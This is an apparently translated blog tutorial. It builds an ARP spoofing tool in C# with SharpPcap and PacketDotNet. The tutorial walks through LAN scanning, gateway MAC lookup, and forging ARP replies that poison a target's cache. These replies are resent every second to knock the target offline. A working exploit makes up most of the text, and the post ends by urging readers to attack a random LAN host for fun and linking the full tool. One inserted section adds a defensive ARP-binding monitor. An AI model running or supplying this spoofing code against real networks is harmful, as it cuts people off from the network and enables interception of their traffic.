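An explanation of ARP spoofing quoted from the web: ARP spoofing, also called ARP poisoning (often rendered online as "ARP virus") or an ARP attack, is an attack technique against the Ethernet Address Resolution Protocol (ARP). By deceiving a visitor's PC on the LAN about the gateway's MAC address, it makes that PC mistake the attacker-altered MAC address for the gateway's MAC, so the network becomes unreachable. This attack lets the attacker capture packets on the LAN and even tamper with them, and can leave specific computers, or all computers, on the network unable to connect normally.
In my own words: tell the target host a wrong gateway MAC address, which directly prevents the target host from reaching the internet, or Ethernet on other network segments, through the gateway.
Host spoofing
Build an ARP packet that sends the gateway IP address together with a wrong gateway MAC address to the target host, so that the host writes the wrong MAC-to-IP mapping into its cache.
Tools
Open-source .NET ARP libraries: SharpPcap, PacketDotNet
Add to the project: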
<PackageReference Include="PacketDotNet" Version="1.4.7" />
<PackageReference Include="SharpPcap" Version="6.2.5" />
Hands-on
Get all network devices on the local machine
LibPcapLiveDeviceList.Instance
Get the device's IP and MAC address, and the gateway IP
foreach (var address in LibPcapLiveDevice.Addresses)
{
    if (address.Addr.type == Sockaddr.AddressTypes.AF_INET_AF_INET6)
    {
        // IPv4 address
        if (address.Addr.ipAddress.AddressFamily == AddressFamily.InterNetwork)
        {
            LocalIp = address.Addr.ipAddress;
            break;
        }
    }
}
foreach (var address in LibPcapLiveDevice.Addresses)
{
    if (address.Addr.type == Sockaddr.AddressTypes.HARDWARE)
    {
        LocalMac = address.Addr.hardwareAddress; // local MAC
    }
}
var gw = LibPcapLiveDevice.Interface.GatewayAddresses; // gateway IPs
// IPv4 gateway
GatewayIp = gw?.FirstOrDefault(x => x.AddressFamily == AddressFamily.InterNetwork);
Get the gateway MAC address
Send an ARP packet to the gateway, receive the response packet, and read the MAC address from it.
1. Build the ARP packet
var ethernetPacket = new EthernetPacket(localMac, PhysicalAddress.Parse("FF-FF-FF-FF-FF-FF"), EthernetType.Arp);
var arpPacket = new ArpPacket(ArpOperation.Request, PhysicalAddress.Parse("00-00-00-00-00-00"), destinationIP, localMac, localIP);
ethernetPacket.PayloadPacket = arpPacket;
2. Send the ARP packet to the gateway and wait for the next reply packet.
LibPcapLiveDevice.Open(DeviceModes.Promiscuous, 20);
LibPcapLiveDevice.Filter = arpFilter;
var lastRequestTime = DateTime.FromBinary(0);
var requestInterval = TimeSpan.FromMilliseconds(200);
// Set only when a packet from the requested IP arrives, so a timeout returns null
// instead of the MAC of whichever unrelated ARP packet was seen last.
PhysicalAddress resolvedMac = null;
var timeoutDateTime = DateTime.Now + _timeout;
while (DateTime.Now < timeoutDateTime)
{
    // resend the request every 200 ms until a reply arrives
    if (requestInterval < (DateTime.Now - lastRequestTime))
    {
        LibPcapLiveDevice.SendPacket(request);
        lastRequestTime = DateTime.Now;
    }
    if (LibPcapLiveDevice.GetNextPacket(out var packet) > 0)
    {
        if (packet.Device.LinkType != LinkLayers.Ethernet)
        {
            continue;
        }
        var pack = Packet.ParsePacket(packet.Device.LinkType, packet.Data.ToArray());
        var arpPacket = pack.Extract<ArpPacket>();
        if (arpPacket == null) // is this an ARP packet?
        {
            continue;
        }
        if (arpPacket.SenderProtocolAddress.Equals(destIP))
        {
            resolvedMac = arpPacket.SenderHardwareAddress;
            break;
        }
    }
}
// free the device
LibPcapLiveDevice.Close();
return resolvedMac;
Scan the LAN for active IPs and MAC addresses
1. Set the IP range to scan and generate an ARP request packet for each IP
var arpPackets = new Packet[targetIPList.Count];
for (int i = 0; i < arpPackets.Length; ++i)
{
    arpPackets[i] = BuildRequest(targetIPList[i], LocalMac, LocalIp);
}
2. Send the ARP packet to each IP; a host that replies is online, and one that times out is considered inactive
// one pass per target IP (the loop the fragment below runs inside)
for (int i = 0; i < arpPackets.Length; ++i)
{
    if (_cancellationTokenSource.IsCancellationRequested)
    {
        break;
    }
    var lastRequestTime = DateTime.FromBinary(0);
    var requestInterval = TimeSpan.FromMilliseconds(200);
    var timeoutDateTime = DateTime.Now + _timeout;
    while (DateTime.Now < timeoutDateTime)
    {
        if (_cancellationTokenSource.IsCancellationRequested)
        {
            break;
        }
        if (requestInterval < (DateTime.Now - lastRequestTime))
        {
            LibPcapLiveDevice.SendPacket(arpPackets[i]);
            lastRequestTime = DateTime.Now;
        }
        if (LibPcapLiveDevice.GetNextPacket(out var packet) > 0)
        {
            if (packet.Device.LinkType != LinkLayers.Ethernet)
            {
                continue;
            }
            var pack = Packet.ParsePacket(packet.Device.LinkType, packet.Data.ToArray());
            var arpPacket = pack.Extract<ArpPacket>();
            if (arpPacket == null)
            {
                continue;
            }
            // an ARP reply from the IP address we asked about
            if (arpPacket.SenderProtocolAddress.Equals(targetIPList[i]))
            {
                Application.Current.Dispatcher.Invoke(() =>
                {
                    // add to the IP list
                    Computers.Add(new Computer()
                    {
                        IPAddress = arpPacket.SenderProtocolAddress.ToString(),
                        MacAddress = arpPacket.SenderHardwareAddress?.ToString(),
                    });
                });
                break;
            }
        }
    }
}
Attacking specified IP(s)
An attack packet cannot be built as a request packet; instead, a response packet that appears to come from the gateway should be forged, so that a wrong MAC address for the gateway is written into the target host's cache.
1. Build the wrong response packet
private Packet BuildResponse(IPAddress destIP, PhysicalAddress destMac, IPAddress senderIP, PhysicalAddress senderMac)
{
    var ethernetPacket = new EthernetPacket(senderMac, destMac, EthernetType.Arp);
    var arpPacket = new ArpPacket(ArpOperation.Response, destMac, destIP, senderMac, senderIP);
    ethernetPacket.PayloadPacket = arpPacket;
    return ethernetPacket;
}
Call it to build the ARP response packet. Note that the last MAC address argument, which should be the gateway's MAC address, has been replaced with our own local MAC address.
BuildResponse(IPAddress.Parse(compute.IPAddress), PhysicalAddress.Parse(compute.MacAddress), GatewayIp, LocalMac);
2. Send the response packet to the target host in a polling loop at a 1000 ms interval
var aTask = Task.Run(async () =>
{
    while (true)
    {
        if (_cancellationTokenSource1.IsCancellationRequested)
        {
            break;
        }
        try
        {
            LibPcapLiveDevice.SendPacket(packet);
        }
        catch (Exception ex)
        {
            MessageBox.Show(ex.Message);
        }
        await Task.Delay(1000);
    }
    LibPcapLiveDevice.Close();
}, _cancellationTokenSource1.Token);
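Seen from the defending side, the forged reply above is an ARP packet whose sender IP is the gateway's while its sender MAC is not. The following is an added example, not code from the original post or the linked project: a passive check that compares each ARP sender binding against a pinned gateway MAC. The `ArpBindingMonitor` class, its method names and all addresses are hypothetical and constructed for illustration; only PacketDotNet is assumed.

```csharp
using System;
using System.Collections.Generic;
using System.Net;
using System.Net.NetworkInformation;
using PacketDotNet;

// All addresses below are constructed sample values.
var gwIp = IPAddress.Parse("192.168.1.1");
var gwMac = PhysicalAddress.Parse("AA-AA-AA-AA-AA-01");
var hostIp = IPAddress.Parse("192.168.1.20");
var hostMac = PhysicalAddress.Parse("BB-BB-BB-BB-BB-20");
var otherMac = PhysicalAddress.Parse("CC-CC-CC-CC-CC-66");
var monitor = new ArpBindingMonitor();
monitor.Pin(gwIp, gwMac); // known-good binding, e.g. a static entry recorded at install time

// Frame 1: genuine gateway reply. Frame 2: a different MAC claims the gateway IP.
var frames = new[] { Reply(gwIp, gwMac, hostIp, hostMac), Reply(gwIp, otherMac, hostIp, hostMac) };
foreach (var frame in frames)
    Console.WriteLine(monitor.Inspect(frame) ?? "ok");

static byte[] Reply(IPAddress senderIp, PhysicalAddress senderMac, IPAddress targetIp, PhysicalAddress targetMac)
{
    var eth = new EthernetPacket(senderMac, targetMac, EthernetType.Arp);
    eth.PayloadPacket = new ArpPacket(ArpOperation.Response, targetMac, targetIp, senderMac, senderIp);
    return eth.Bytes;
}

sealed class ArpBindingMonitor // hypothetical helper, not part of SharpPcap or PacketDotNet
{
    private readonly Dictionary<IPAddress, PhysicalAddress> _pinned = new();
    private readonly Dictionary<IPAddress, PhysicalAddress> _learned = new();
    public void Pin(IPAddress ip, PhysicalAddress mac) => _pinned[ip] = mac;
    // Returns a finding for the frame, or null when it is not ARP or nothing is wrong.
    public string Inspect(byte[] rawFrame)
    {
        var eth = Packet.ParsePacket(LinkLayers.Ethernet, rawFrame).Extract<EthernetPacket>();
        var arp = eth?.Extract<ArpPacket>();
        if (arp == null || arp.SenderProtocolAddress.Equals(IPAddress.Any)) return null; // skip non-ARP and ARP probes
        var ip = arp.SenderProtocolAddress;
        var mac = arp.SenderHardwareAddress;
        if (!eth.SourceHardwareAddress.Equals(mac))
            return $"MISMATCH {ip}: Ethernet source {eth.SourceHardwareAddress} differs from ARP sender {mac}";
        if (_pinned.TryGetValue(ip, out var pinned) && !pinned.Equals(mac))
            return $"ALERT {ip}: pinned to {pinned} but claimed by {mac}";
        var changed = _learned.TryGetValue(ip, out var previous) && !previous.Equals(mac);
        _learned[ip] = mac; // a change can be legitimate (failover, NIC swap), so it is only a warning
        return changed ? $"WARN {ip}: binding moved from {previous} to {mac}" : null;
    }
}
```

In a live deployment the frames would come from a capture device filtered to ARP rather than from the `Reply` helper, and the pinned table would be filled from a trusted source such as static configuration.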
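Result
Pick a random LAN IP and attack it! Watch it lose its internet access. Remember, this is for entertainment only; do not affect any work or business.
Full code and tool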
https://github.com/BruceQiu1996/ArpSpoofing
References
https://www.cnblogs.com/fantacity/p/4792689.html
https://github.com/dotpcap/sharppcap